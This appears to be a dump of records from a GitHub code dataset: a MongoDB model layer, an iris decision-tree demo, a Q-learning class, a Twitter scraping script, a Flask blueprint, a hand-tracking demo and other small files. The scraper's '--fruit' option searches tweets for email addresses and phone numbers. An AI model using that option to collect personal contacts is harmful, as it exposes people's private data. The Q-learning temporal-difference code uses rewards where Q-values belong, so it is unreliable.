Optional[Validator[Document]] = None\n self.defaults: Optional[Document] = None\n\n def build_dict(self, **kwargs: Kwargs) -> Document:\n doc = {}\n for key, value in kwargs.items():\n doc[key] = value\n return doc\n\n def add(self, **kwargs: Kwargs) -> Optional[Document]:\n doc = self.build_dict(**kwargs)\n return self.d_add(doc)\n\n def _add_def(self, doc: Document) -> Document:\n if self.defaults is not None:\n for key, value in self.defaults.items():\n if key not in doc:\n if callable(value):\n doc[key] = value()\n else:\n doc[key] = value\n return doc\n\n def d_add(self, doc: Document) -> Optional[Document]:\n self._add_def(doc)\n if self.validator is not None and not self.validator.validate(doc):\n return None\n return self.collection.insert_one(doc)\n\n def d_update(self, find: Document, doc: Document,\n upsert=True) -> Optional[Document]:\n\n value = self.collection.find_one_and_update(\n find, {\"$set\": doc}, upsert=False,\n return_document=ReturnDocument.AFTER)\n if value:\n return value\n\n if not upsert:\n return None\n\n return self.d_add({**find, **doc})\n\n def d_rewrite(self, keys: List[str], doc: Document) -> Optional[Document]:\n find = {}\n for key in keys:\n find[key] = doc[key]\n return self.d_update(find, doc, upsert=True)\n\n def get(self, **kwargs: Kwargs) -> List[Document]:\n query = self.build_dict(**kwargs)\n return self.collection.find(query)\n\n def get_one(self, **kwargs: Kwargs) -> Optional[Document]:\n query = self.build_dict(**kwargs)\n return self.collection.find_one(query)\n\n def get_by_id(self, id: MongoId) -> Optional[Document]:\n return self.collection.find_one({\"_id\": id})\n\n def exists(self, **kwargs: Kwargs) -> bool:\n return self.get_one(**kwargs) is not None\n\n\nclass User(Model):\n\n def __init__(self, collection: Collection):\n super().__init__(collection)\n self.validator = SequentialValidator([\n ReqFieldsValidator([\"client_ser\", \"client_id\", \"username\"]),\n PrimaryKeyValidator(collection, [\"client_ser\", \"client_id\"]),\n DictValidator({\n \"client_ser\": StringValidator(min_size=1, max_size=64),\n \"client_id\": StringValidator(min_size=1, max_size=64),\n \"username\": StringValidator(min_size=1, max_size=64),\n \"levelcode\": OptionalValidator(codeValidator),\n \"worldcode\": OptionalValidator(codeValidator)\n })\n ])\n self.defaults = {\n \"levelcode\": None,\n \"worldcode\": None\n }\n\n def get_user(self, userkey: UserKey) -> Optional[Document]:\n return self.get_one(client_ser=userkey[0], client_id=userkey[1])\n\n def get_users(self, userkeys: List[UserKey]) -> List[Document]:\n users = []\n for userkey in userkeys:\n user = self.get_user(userkey)\n if user is not None:\n users.append(user)\n return users\n\n def add_user(self, userkey: UserKey, username: str) -> Optional[Document]:\n return self.add(client_ser=userkey[0], client_id=userkey[1],\n username=username)\n\n def open_user(self, userkey: UserKey, username: str) -> Optional[Document]:\n user = self.get_user(userkey)\n if user:\n return user\n return self.add_user(userkey, username)\n\n def move_user(self, userkey: UserKey, worldcode: str,\n levelcode: str) -> Optional[Document]:\n return self.collection.update_one(\n {'client_ser': userkey[0],\n 'client_id': userkey[1]},\n {\"$set\": {\"levelcode\": levelcode, \"worldcode\": worldcode}},\n upsert=False\n )\n\n\ncodeValidator = StringValidator(min_size=1, max_size=6)\ntitleValidator = StringValidator(min_size=1, max_size=64)\n\n\nclass World(Model):\n\n def __init__(self, collection: Collection):\n super().__init__(collection)\n self.doc_validator = SequentialValidator([\n ReqFieldsValidator([\"title\", \"code\", \"tags\", \"prereqs\"]),\n DictValidator({\n \"title\": titleValidator,\n \"code\": codeValidator,\n \"tags\": ListValidator(StringValidator(min_size=4,\n max_size=32)),\n \"prereqs\": ListValidator(RefKeyValidator(collection, \"code\")),\n })\n ])\n self.validator = SequentialValidator([\n self.doc_validator,\n PrimaryKeyValidator(collection, [\"code\"])\n ])\n self.defaults = {\n \"tags\": [],\n \"prereqs\": [],\n }\n\n\nclass Level(Model):\n\n def __init__(self, collection: Collection, worlds: Collection):\n super().__init__(collection)\n self.doc_validator = SequentialValidator([\n ReqFieldsValidator(\n [\"title\", \"code\", \"worldcode\", \"prereqs\", \"pipeline\"]),\n DictValidator({\n \"title\": titleValidator,\n \"desc\": StringValidator(),\n\n \"code\": codeValidator,\n \"worldcode\": RefKeyValidator(worlds, \"code\"),\n\n \"prereqs\": ListValidator(RefKeyValidator(collection, \"code\")),\n\n \"pipeline\": StringValidator(min_size=4, max_size=16),\n \"attrs\": DictValidator({}),\n \"tests\": ListValidator(None),\n\n \"tags\": ListValidator(StringValidator(min_size=4,\n max_size=32)),\n })\n ])\n self.validator = SequentialValidator([\n PrimaryKeyValidator(collection, [\"worldcode\", \"code\"]),\n self.doc_validator\n ])\n self.defaults = {\n \"desc\": \"\",\n \"tags\": [],\n \"prereqs\": [],\n \"tests\": [],\n \"attrs\": {}\n }\n\n def get_by_code(self, worldcode: str,\n levelcode: str) -> Optional[Document]:\n return self.get_one(worldcode=worldcode, code=levelcode)\n\n\nCodeblockValidator = StringValidator(min_size=1, max_size=4096)\n\n\nclass Workplace(Model):\n\n def __init__(self, collection: Collection, users: Collection,\n worlds: Collection):\n super().__init__(collection)\n self.doc_validator = SequentialValidator([\n ReqFieldsValidator([\"user\", \"worldcode\", \"submissions\"]),\n DictValidator({\n \"user\": RefKeyValidator(users, \"_id\"),\n \"worldcode\": RefKeyValidator(worlds, \"code\"),\n \"submissions\": ListValidator(\n ListValidator(CodeblockValidator)),\n \"bench\": ListValidator(CodeblockValidator)\n })\n ])\n self.validator = SequentialValidator([\n PrimaryKeyValidator(collection, [\"user\", \"worldcode\"]),\n self.doc_validator\n ])\n self.defaults = {\"submissions\": [], \"bench\": []}\n\n def add_submission(self, userid: MongoId, worldcode: str,\n submission: List[str]) -> Optional[Document]:\n doc = self.build_dict(user=userid, worldcode=worldcode)\n if self.collection.find_one(doc) is None:\n if self.d_add(doc) is None:\n return None\n\n document = self.collection.find_one(doc)\n\n if document is None:\n return None\n\n submissions = document[\"submissions\"]\n submissions.append(submission)\n if len(submissions) > MAX_CODEBLOCKS:\n submissions = submissions[len(submissions) - MAX_CODEBLOCKS:]\n return self.collection \\\n .update_one(doc, {'$set': {\"submissions\": submissions}})\n\n def get_workplaces(self, userids: List[MongoId],\n worldcode: str) -> List[Document]:\n return self.collection.find({\"worldcode\": worldcode,\n \"user\": {\"$in\": userids}})\n\n def get_codeblocks(self, userids: List[MongoId],\n worldcode: str) -> Dict[MongoId, List[str]]:\n workplaces = self.get_workplaces(userids, worldcode)\n result = {}\n for workplace in workplaces:\n submissions = workplace[\"submissions\"]\n codeblocks = []\n if submissions is not None and len(submissions) != 0:\n codeblocks = submissions[-1]\n result[workplace[\"user\"]] = codeblocks\n return result\n\n def get_workbenches(self, userids: List[MongoId],\n worldcode: str) -> Dict[MongoId, List[str]]:\n result = {}\n for workplace in self.get_workplaces(userids, worldcode):\n result[workplace[\"user\"]] = workplace[\"bench\"]\n return result\n\n def set_workbenches(self, codeblocks: Dict[MongoId, List[str]],\n worldcode: str):\n results = []\n for userid, blocks in codeblocks.items():\n res = self.d_update(\n {\"user\": userid, \"worldcode\": worldcode}, {\"bench\": blocks})\n print(res)\n if res is not None:\n results.append(res)\n return results\n\n\nclass Solution(Model):\n\n def __init__(self, collection: Collection, users: Collection,\n levels: Collection, worlds: Collection):\n super().__init__(collection)\n self.doc_validator = SequentialValidator([\n ReqFieldsValidator(\n [\"user\", \"levelcode\", \"worldcode\", \"mark\", \"date\"]),\n DictValidator({\n \"user\": RefKeyValidator(users, \"_id\"),\n \"levelcode\": RefKeyValidator(levels, \"code\"),\n \"worldcode\": RefKeyValidator(worlds, \"code\"),\n \"mark\": IntegerValidator(0, 3),\n # TODO: date validator\n }),\n RefValidator(levels, {\"levelcode\": \"code\",\n \"worldcode\": \"worldcode\"})\n ])\n self.validator = SequentialValidator([\n PrimaryKeyValidator(\n collection, ['user', 'levelcode', 'worldcode']),\n self.doc_validator\n ])\n self.defaults = {\n \"date\": datetime.now\n }\n\n def add_solution(self, userid: MongoId, worldcode: str, levelcode: str,\n mark: int) -> Optional[Document]:\n sol_doc = self.build_dict(user=userid, levelcode=levelcode,\n worldcode=worldcode, mark=mark)\n return self.d_rewrite(['user', 'levelcode', 'worldcode'], sol_doc)\n\n def get_solutions(self, userid: MongoId, worldcode: Optional[str] = None) \\\n -> List[Document]:\n query = {\"user\": userid}\n if worldcode is not None:\n query['worldcode'] = worldcode\n return self.collection.find(query)\n\n\nclass EllatuDB:\n\n def __init__(self, host: str, port: Optional[int] = None,\n db_name: str = DB_DEV):\n self.client = MongoClient(host, port)\n self.db = self.client[db_name]\n self.user = User(self.db[COL_USERS])\n self.world = World(self.db[COL_WORLDS])\n self.level = Level(self.db[COL_LEVELS], self.db[COL_WORLDS])\n self.workplace = Workplace(self.db[COL_WORKPLACES],\n self.db[COL_USERS],\n self.db[COL_WORLDS])\n self.solution = Solution(self.db[COL_SOLUTIONS],\n self.db[COL_USERS],\n self.db[COL_LEVELS],\n self.db[COL_WORLDS])\n","repo_name":"sixkey/ellatu","sub_path":"src/ellatu/ellatu_db.py","file_name":"ellatu_db.py","file_ext":"py","file_size_in_byte":20139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"72566429210","text":"# encoding = utf-8\n\n# load packages ====================================\nimport numpy as np\nimport pandas as pd\nfrom sklearn import datasets\nimport matplotlib.pyplot as plt\n\n# load dataset ======================================\niris = datasets.load_iris()\nX = iris.data[:, [2, 3]]\ny = iris.target\n# split data into train and test datasets\nfrom sklearn.cross_validation import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.3, random_state = 0)\n\n\n# modeling ========================================\nfrom sklearn.tree import DecisionTreeClassifier\n# 使用熵作为度量,训练一颗最大深度为3的决策树\ntree = DecisionTreeClassifier(criterion = 'entropy', max_depth = 3, random_state = 0)\ntree.fit(X_train, y_train)\n\n\n# define plot_decision_region function ====================\nfrom matplotlib.colors import ListedColormap\ndef plot_decision_region(X, y, classifier, resolution = 0.02):\n # setup marker generator and color map\n markers = ('s', 'x', 'o', '^', 'v')\n colors = ('red', 'blue', 'lightgreen', 'gray', 'cyan')\n cmap = ListedColormap(colors[:len(np.unique(y))])\n # plot the decision surface\n x1_min, x1_max = X[:, 0].min() - 1, X[:, 0].max() + 1\n x2_min, x2_max = X[:, 1].min() - 1, X[:, 1].max() + 1\n xx1, xx2 = np.meshgrid(np.arange(x1_min, x1_max, resolution),\n np.arange(x2_min, x2_max, resolution))\n Z = classifier.predict(np.array([xx1.ravel(), xx2.ravel()]).T)\n Z = Z.reshape(xx1.shape)\n plt.contourf(xx1, xx2, Z, alpha = 0.4, cmap = cmap)\n plt.xlim(xx1.min(), xx1.max())\n plt.ylim(xx2.min(), xx2.max())\n # plot class samples\n for idx, cl in enumerate(np.unique(y)):\n plt.scatter(x = X[y == cl, 0], y = X[y == cl, 1],\n alpha = 0.8, c = cmap(idx),\n marker = markers[idx], label = cl)\n\n# plot ============================================\nplot_decision_region(X_train, y_train, classifier = tree)\nplt.legend()\nplt.show()\n\n# 把模型输出保存为.dot文件 ==========================\nfrom sklearn.tree import export_graphviz\nexport_graphviz(tree, out_file = 'tree.dot', feature_names = ['petal Length', 'petal Width'])\n\n\n\n\n\n","repo_name":"zenbook/Jeremy-python","sub_path":"03_machine_learning/python_machine_learning/chapter03_Scikit-learn/dicision_tree.py","file_name":"dicision_tree.py","file_ext":"py","file_size_in_byte":2243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"11095112824","text":"from pa3_solving_mdps.mdp_state import MDPState\nfrom typing import Dict, List\n\n\nclass QLearning:\n '''Q-Learning Class, holds all logic for Q-Learning\n '''\n\n def __init__(self, mdpStates: Dict[str, MDPState], alpha: float=0.1, lam: float=0.99, maxChangeThreshold: float=0.001, alphaChangeRate: float=0.99) -> None:\n '''Constructor for QLearning class.\n\n Args:\n mdpStates (Dict[str, MDPState]): The modeld MDP.\n alpha (float, optional): The alpha, aka, the Learning Rate. Defaults to 0.1.\n lam (float, optional): The lambda, aka, the Discount Rate.. Defaults to 0.99.\n maxChangeThreshold (float, optional): The maximum change between q-values that will cause the algorithm to stop. Defaults to 0.001.\n alphaChangeRate (float, optional): The rate and which alpha will change after each episode (alpha = alpha * alphaChangeRate). Defaults to 0.99.\n '''\n self.mdpStates = mdpStates\n # Learning rate.\n self.alpha: float = alpha\n # Dicount rate.\n self.lam: float = lam\n # The max change before we stop.\n self.maxChangeThreshold = maxChangeThreshold\n # The rate of change for alpha. alpha = alpha * alphaChangeRate\n self.alphaChangeRate = alphaChangeRate\n \n\n def qLearningAlg(self, startStateName: str, endStateName: str) -> None:\n '''The actual Q-Learning algorithm.\n\n Args:\n startStateName (str): The name of the start state.\n endStateName (str): The name of the end state.\n '''\n\n # Flag for if we meat the threshold.\n thresholdMet: bool = False\n # The number of episodes.\n episodeCount: int = 0\n # Keep going until we reach the threshold for stopping the algoirhtm.\n while (thresholdMet is False):\n\n # At the beginning of each episode, go to the starting state.\n currentState: MDPState = self.mdpStates.get(startStateName)\n # Go through the MDP until we reach the end state. THis will be an episode.\n while (currentState.name != endStateName):\n print(\"____State: \" + currentState.name + \"____\")\n\n # Pick a random action from the current state.\n randAction: str = MDPState.pickRandAction(currentState)\n\n # Get the reward for that action.\n actionRewards: List[int] = currentState.getActionRewards(randAction)\n \n # Get the next state name for taking that action at our current state. \n nextStateName: str = currentState.getActionNextStates(randAction)[0]\n # Get the actual state object using the state name.\n nextState: MDPState = self.mdpStates.get(nextStateName)\n\n # If the next state is the end state, there is no calculations that can be done so we move on to the next episode.\n if (nextState.name == \"11aCB\"):\n break\n \n # Get the q value for the current state/action pair.\n newQvalue: float = self.qValue(currentState, randAction, nextState)\n\n # Print the details for this episode.\n print(\"Action Taken: \" + randAction)\n print(\"Reward: \" + str(actionRewards[0]))\n print(\"Prev. Q Value: \" + str(currentState.getActionQValues(randAction)[0]))\n print(\"New Q Value: \" + str(newQvalue))\n\n # If the change between the new q-value and the old q-vlaue is less than the max alpha change, we end the algorithm.\n if (newQvalue - currentState.getActionQValues(randAction)[0] < self.maxChangeThreshold):\n print(\"CHANGE LESS THAN 0.001\")\n thresholdMet = True\n break\n \n # Update the state/action pairs q-value.\n currentState.setActionQValue(randAction, newQvalue, 0)\n\n # Go to the next state.\n currentState = self.mdpStates.get(currentState.getActionNextStates(randAction)[0])\n\n print(\"End of episode \" + str(episodeCount) + \".\")\n # After each episode, make the alpha smaller.\n self.alpha = self.alpha * self.alphaChangeRate\n # Increment episdoe counter.\n episodeCount += 1\n \n # Finally, when we are done with the algorithm, print out all the details.\n print()\n print(\"*****FINAL RESULTS*****\")\n self.printAllQValues()\n print()\n print(\"Number of Episodes: \" + str(episodeCount))\n print(\"Optimal Path: \" + str(self.getOptimalPath(startStateName, endStateName)))\n \n \n\n def temporalDifference(self, currentState: MDPState, action: str, nextState: MDPState) -> float:\n '''Calculates the temporal difference of the state/action pair.\n\n Args:\n currentState (MDPState): The current state we are at.\n action (str): The action we took in the current state.\n nextState (MDPState): The next state for preforming the state/action pair.\n\n Returns:\n float: The temporal difference of the state/action pair.\n '''\n # First, we need to get the list of all q-values from the next state.\n listOfActionsRewards: List[int] = []\n actionName: str\n for actionName in nextState.actions.keys():\n listOfActionsRewards.append(nextState.getActionRewards(actionName)[0])\n \n return currentState.getActionRewards(action)[0] + (self.lam * max(listOfActionsRewards) - currentState.getActionQValues(action)[0])\n \n def qValue(self, currentState: MDPState, action: str, nextState: MDPState) -> float:\n '''Calculates the q-value for the state/action pair.\n\n Args:\n currentState (MDPState): The current state we are at.\n action (str): The action we took in the current state.\n nextState (MDPState): The next state for taking action and the current state.\n\n Returns:\n float: The q-value for the action/pair.\n '''\n return currentState.getActionQValues(action)[0] + (self.alpha * self.temporalDifference(currentState, action, nextState))\n\n def getOptimalPath(self, startStateName: str, endStateName: str) -> List[str]:\n '''Returns the optimal state path as a list by getting the best q-values.\n\n Args:\n startStateName (str): The starting state name.\n endStateName (str): The endind state name.\n\n Returns:\n List[str]: The best path from the starting state to the end state as a list.\n '''\n # List to hold our path.\n shortestPath: List[str] = []\n currentState: MDPState = self.mdpStates.get(startStateName)\n\n # Put the starting state in the path.\n shortestPath.append(currentState.name)\n\n # Go through the MDP while we have not reached the end.\n while (currentState.name != endStateName):\n # Gets the best q-value action from the current state.\n bestAction: str = MDPState.getBestQValueAction(currentState)\n\n # Set the current state by using the action with the best q-value.\n currentState = self.mdpStates.get(currentState.getActionNextStates(bestAction)[0])\n # Add that state to the path.\n shortestPath.append(currentState.name)\n\n return shortestPath\n\n def printAllQValues(self) -> None:\n '''Prints out all the q-values for the MDP.\n '''\n \n stateName: str\n for stateName in self.mdpStates.keys():\n state: MDPState = self.mdpStates.get(stateName)\n # print(\"____State: \" + state.name + \"____\")\n print(\"____State: {}\".format(stateName) + \"____\")\n \n action: str\n for action in state.actions.keys():\n print(\"Action: {}\".format(action) + \" Q-Value: {:.4f}\".format(state.getActionQValues(action)[0]))\n # print(\"Action: \" + action + \" Q-Value: \" + str(state.getActionQValues(action)[0]))\n \n \n\n\n\n\n\n\n\n# Work of: Timothy P. McCrary, Jesus M. Hernandez\n","repo_name":"tpmccrary/PA3-Solving-MDPs","sub_path":"pa3_solving_mdps/q_learning.py","file_name":"q_learning.py","file_ext":"py","file_size_in_byte":8244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"7725296103","text":"#!/usr/bin/python3\nfrom bs4 import BeautifulSoup\nfrom time import gmtime, strftime\nimport argparse\nimport aiohttp\nimport asyncio\nimport async_timeout\nimport datetime\nimport json\nimport sys\n\nasync def getUrl(init):\n\tif init == -1:\n\t\turl = \"https://twitter.com/search?f=tweets&vertical=default&lang=en&q=\"\n\telse:\n\t\turl = \"https://twitter.com/i/search/timeline?f=tweets&vertical=default\"\n\t\turl+= \"&lang=en&include_available_features=1&include_entities=1&reset_\"\n\t\turl+= \"error_state=false&src=typd&max_position={}&q=\".format(init)\n\n\tif arg.u != None:\n\t\turl+= \"from%3A{0.u}\".format(arg)\n\tif arg.s != None:\n\t\targ.s = arg.s.replace(\" \", \"%20\").replace(\"#\", \"%23\")\n\t\turl+= \"%20{0.s}\".format(arg)\n\tif arg.till != None:\n\t\turl+= \"%20until%3A{0.till}\".format(arg)\n\tif arg.since != None:\n\t\turl+= \"%20since%3A{0.since}\".format(arg)\n\tif arg.fruit:\n\t\turl+= \"%20myspace.com%20OR%20last.fm%20OR\"\n\t\turl+= \"%20mail%20OR%20email%20OR%20gmail%20OR%20e-mail\"\n\t\turl+= \"%20OR%20phone%20OR%20call%20me%20OR%20text%20me\"\n\t\turl+= \"%20OR%20keybase\"\n\tif arg.verified:\n\t\turl+= \"%20filter%3Averified\"\n\n\treturn url\n\nasync def fetch(session, url):\n\twith async_timeout.timeout(30):\n\t\tasync with session.get(url) as response:\n\t\t\treturn await response.text()\n\nasync def getFeed(init):\n\tasync with aiohttp.ClientSession() as session:\n\t\tr = await fetch(session, await getUrl(init))\n\tfeed = []\n\ttry:\n\t\tif init == -1:\n\t\t\thtml = r\n\t\telse:\n\t\t\tjson_response = json.loads(r)\n\t\t\thtml = json_response[\"items_html\"]\n\t\tsoup = BeautifulSoup(html, \"html.parser\")\n\t\tfeed = soup.find_all(\"li\", \"js-stream-item\")\n\t\tprint(feed)\n\t\tif init == -1:\n\t\t\tinit = \"TWEET-{}-{}\".format(feed[-1][\"data-item-id\"], feed[0][\"data-item-id\"])\n\t\telse:\n\t\t\tsplit = json_response[\"min_position\"].split(\"-\")\n\t\t\tsplit[1] = feed[-1][\"data-item-id\"]\n\t\t\tinit = \"-\".join(split)\n\texcept:\n\t\tpass\n\n\treturn feed, init\n\nasync def getTweets(init):\n\ttweets, init = await getFeed(init)\n\tfor tweet in tweets:\n\t\ttweetid = tweet[\"data-item-id\"]\n\t\tdatestamp = tweet.find(\"a\", \"tweet-timestamp\")[\"title\"].rpartition(\" - \")[-1]\n\t\td = datetime.datetime.strptime(datestamp, \"%d %b %Y\")\n\t\tdate = d.strftime(\"%Y-%m-%d\")\n\t\ttimestamp = str(datetime.timedelta(seconds=int(tweet.find(\"span\", \"_timestamp\")[\"data-time\"]))).rpartition(\", \")[-1]\n\t\tt = datetime.datetime.strptime(timestamp, \"%H:%M:%S\")\n\t\ttime = t.strftime(\"%H:%M:%S\")\n\t\tusername = tweet.find(\"span\", \"username\").text.replace(\"@\", \"\")\n\t\ttimezone = strftime(\"%Z\", gmtime())\n\t\ttext = tweet.find(\"p\", \"tweet-text\").text.replace(\"\\n\", \" \")\n\t\ttry:\n\t\t\tmentions = tweet.find(\"div\", \"js-original-tweet\")[\"data-mentions\"].split(\" \")\n\t\t\tfor i in range(len(mentions)):\n\t\t\t\tmention = \"@{}\".format(mentions[i])\n\t\t\t\tif mention not in text:\n\t\t\t\t\ttext = \"{} {}\".format(mention, text)\n\t\texcept:\n\t\t\tpass\n\n\t\tif arg.users:\n\t\t\toutput = username\n\t\telif arg.tweets:\n\t\t\toutput = tweets\n\t\telse:\n\t\t\toutput = \"{} {} {} {} <{}> {}\".format(tweetid, date, time, timezone, username, text)\n\n\t\tif arg.o != None:\n\t\t\tprint(output.encode('ascii', 'ignore').decode('ascii'), file=open(arg.o, \"a\"))\n\n\t\t# print(output.encode('ascii', 'ignore').decode('ascii'))\n\n\treturn tweets, init\n\nasync def main():\n\tfeed = [-1]\n\tinit = -1\n\twhile True:\n\t\tif len(feed) > 0:\n\t\t\tfeed, init = await getTweets(init)\n\t\telse:\n\t\t\tbreak\n\nif __name__ == \"__main__\":\n\tap = argparse.ArgumentParser(prog=\"tweep.py\", usage=\"python3 %(prog)s [options]\", description=\"tweep.py - An Advanced Twitter Scraping Tool\")\n\tap.add_argument(\"-u\", help=\"User's Tweets you want to scrape.\")\n\tap.add_argument(\"-s\", help=\"Search for Tweets containing this word or phrase.\")\n\tap.add_argument(\"-o\", help=\"Save output to a file.\")\n\tap.add_argument(\"--till\", help=\"Filter Tweets before specified date.\")\n\tap.add_argument(\"--since\", help=\"Filter Tweets sent since date (Example: 2017-12-27).\")\n\tap.add_argument(\"--fruit\", help=\"Display 'low-hanging-fruit' Tweets.\", action=\"store_true\")\n\tap.add_argument(\"--tweets\", help=\"Display Tweets only.\", action=\"store_true\")\n\tap.add_argument(\"--verified\", help=\"Display Tweets only from verified users (Use with -s).\", action=\"store_true\")\n\tap.add_argument(\"--users\", help=\"Display users only (Use with -s).\", action=\"store_true\")\n\targ = ap.parse_args()\n\n\tif arg.u is not None:\n\t\tif arg.users:\n\t\t\tprint(\"[-] Contradicting Args: Please use --users in combination with -s.\")\n\t\t\tsys.exit(0)\n\t\tif arg.verified:\n\t\t\tprint(\"[-] Contradicting Args: Please use --verified in combination with -s.\")\n\t\t\tsys.exit(0)\n\tif arg.tweets and arg.users:\n\t\tprint(\"[-] Contradicting Args: --users and --tweets cannot be used together.\")\n\t\tsys.exit(0)\n\n\tloop = asyncio.get_event_loop()\n\tloop.run_until_complete(main())\n","repo_name":"fin-vermehr/twitter-ideas-spread","sub_path":"tweep.py","file_name":"tweep.py","file_ext":"py","file_size_in_byte":4610,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"4496774064","text":"from sqlalchemy.exc import SQLAlchemyError\nfrom flask import Blueprint, render_template, redirect\n\nfrom model import contrato_dao as dao\nfrom forms import ContratoForm\n\n\nblue = Blueprint('contrato', __name__, static_folder='static', template_folder='templates')\n\n\n@blue.route('/contrato')\ndef contrato():\n rows = dao.select_all()\n table = [dict(row) for row in rows]\n return render_template('table.html', title='Contrato', table=table)\n\n\n@blue.route('/contrato_form', methods=['GET', 'POST'])\ndef contrato_form():\n form = ContratoForm()\n erro = None\n if form.validate_on_submit():\n try:\n dao.insert(form.data)\n except SQLAlchemyError as e:\n erro = e\n return render_template('form.html', title='Realizar Reserva para um Hóspede', form=form, erro=erro)\n return redirect('/reserva')\n return render_template('form.html', title='Novo Contrato de Reserva', form=form, erro=erro)\n","repo_name":"bkpedrosuper/hotel-mongo","sub_path":"routes/contrato.py","file_name":"contrato.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"32702976374","text":"import cv2 \nimport mediapipe as mp\nimport time\n\ncap = cv2.VideoCapture(0)\npTime =0\ncTime =0\nmpHand = mp.solutions.hands\nhands = mpHand.Hands(False)\nmpDraw = mp.solutions.drawing_utils\nwhile(True):\n success,img = cap.read()\n imgRGB = cv2.cvtColor(img,cv2.COLOR_BGR2RGB)\n results = hands.process(imgRGB)\n\n if results.multi_hand_landmarks:\n for handLms in results.multi_hand_landmarks:\n for id,lm in enumerate(handLms.landmark):\n h,w,c = img.shape\n cx,cy = int(lm.x*w) , int(lm.y*h)\n cv2.circle(img,(cx,cy),15,(255,0,255),cv2.FILLED)\n mpDraw.draw_landmarks(img,handLms,mpHand.HAND_CONNECTIONS)\n\n cTime = time.time()\n fps = 1/(cTime-pTime)\n pTime= cTime\n\n cv2.putText(img,str(int(fps)),(10,70),cv2.FONT_HERSHEY_COMPLEX,3,(255,0,255),3)\n cv2.imshow(\"Image\",img)\n if cv2.waitKey(1) & 0xFF == ord(\"q\"):\n break\n\n# Release the camera and all resources\ncap.release()\ncv2.destroyAllWindows()\n","repo_name":"yashb007/computer-vision-mini-projects","sub_path":"hand tracking/hand.py","file_name":"hand.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"31141025097","text":"#coding:utf-8\r\nimport csv\r\nimport os\r\nfrom collections import deque\r\nfrom datetime import datetime\r\nfrom datetime import timedelta\r\n\r\nclass MakeP:\r\n\r\n def __init__(self, ifile, ofile):\r\n self.ifile = ifile\r\n self.ofile = ofile\r\n# os.remove(self.ofile)\r\n self.of = open(self.ofile, \"w\")\r\n self.main()\r\n\r\n def opencsv(self):\r\n data = []\r\n with open(self.ifile, 'r') as filename:\r\n reader = csv.reader(filename, delimiter=\",\")\r\n for row in reader:\r\n data.append(row)\r\n return data\r\n\r\n def ofs(self,str):\r\n self.of.write(str + \"\\n\")\r\n\r\n def timeobj(self,strtime):\r\n time = datetime.strptime(strtime, '%Y/%m/%d %H:%M:%S')\r\n return time\r\n\r\n def time_start(self,strtime, state):\r\n time = self.timeobj(strtime)\r\n if state == \"start\":\r\n if time.second < 50:\r\n time = time + timedelta(seconds = -time.second)\r\n\r\n if state == \"end\":\r\n if time.second > 10:\r\n time = time + timedelta(seconds = -time.second)\r\n time = time + timedelta(minutes = 1)\r\n\r\n time = time + timedelta(seconds= -time.second)\r\n return time\r\n\r\n\r\n def main(self):\r\n self.ofs(\"@class,+id\")\r\n queue = deque(self.opencsv())\r\n try:\r\n while True:\r\n lt = queue.popleft()\r\n times = self.time_start(lt[0], \"start\")\r\n timee = self.time_start(lt[1], \"end\")\r\n\r\n while times <= timee:\r\n print(times.strftime('%Y/%m/%d %H:%M:%S'))\r\n self.ofs(times.strftime('%Y/%m/%d %H:%M:%S'))\r\n times = times + timedelta(minutes=1)\r\n except IndexError:\r\n self.of.close()\r\n\r\nclass MakeN(MakeP):\r\n def time_start(self,strtime, state):\r\n time = self.timeobj(strtime)\r\n if state == \"start\":\r\n if time.second > 0:\r\n time = time + timedelta(seconds= -time.second)\r\n if state == \"end\":\r\n if time .second > 0:\r\n time = time + timedelta(seconds= -time.second)\r\n time = time + timedelta(minutes= 1)\r\n\r\n return time\r\n\r\n def main(self):\r\n queue = deque(self.opencsv())\r\n lt = queue.popleft()\r\n try:\r\n while True:\r\n timee = self.time_start(lt[1], \"end\")\r\n lt = queue.popleft()\r\n times = self.time_start(lt[0], \"start\")\r\n\r\n while timee < times:\r\n print(timee.strftime('%Y/%m/%d %H:%M:%S'))\r\n print(times.strftime('%Y/%m/%d %H:%M:%S'))\r\n self.ofs(timee.strftime('%Y/%m/%d %H:%M:%S'))\r\n timee = timee + timedelta(minutes=1)\r\n except IndexError:\r\n self.of.close()\r\n\r\nmakep = MakeP(\"p.csv\", \"vw.p\")\r\nmaken = MakeN(\"p.csv\", \"vw.n\")\r\n","repo_name":"noahten/study","sub_path":"program/MakeP.py","file_name":"MakeP.py","file_ext":"py","file_size_in_byte":2932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"3131244169","text":"import sys\r\n\r\ndef is_palindrome(string):\r\n pureletters = ''\r\n for i in string:\r\n if i.isalpha():\r\n pureletters += i.lower()\r\n if len(pureletters) < 2:\r\n return True\r\n if pureletters[0] != pureletters[-1]:\r\n return False\r\n return is_palindrome(pureletters[1:-1])\r\n\r\nif __name__ == \"__main__\":\r\n string = sys.argv[1:]\r\n print(string)\r\n if len(string) > 0:\r\n print(is_palindrome(sys.argv[1:]))\r\n else:\r\n string = input(\"What string would you like me to check? \")\r\n print(is_palindrome(string))\r\n","repo_name":"ChrisMcClinch/Hello-World","sub_path":"is_palindrome.py","file_name":"is_palindrome.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"71519300572","text":"import torch\r\nfrom torch.optim import Adam\r\n\r\nimport wandb\r\nfrom common.agent import IsaacAgent\r\nfrom common.policy import GaussianPolicy\r\nfrom common.util import grad_false, hard_update, soft_update, update_params\r\nfrom common.value_function import TwinnedQNetwork\r\n\r\n\r\nclass SACAgent(IsaacAgent):\r\n \"\"\"SAC\r\n Tuomas Haarnoja, Soft Actor-Critic: Off-Policy Maximum Entropy Deep Reinforcement Learning with a Stochastic Actor\r\n see https://github.com/haarnoja/sac/blob/master/sac/algos/sac.py\r\n and 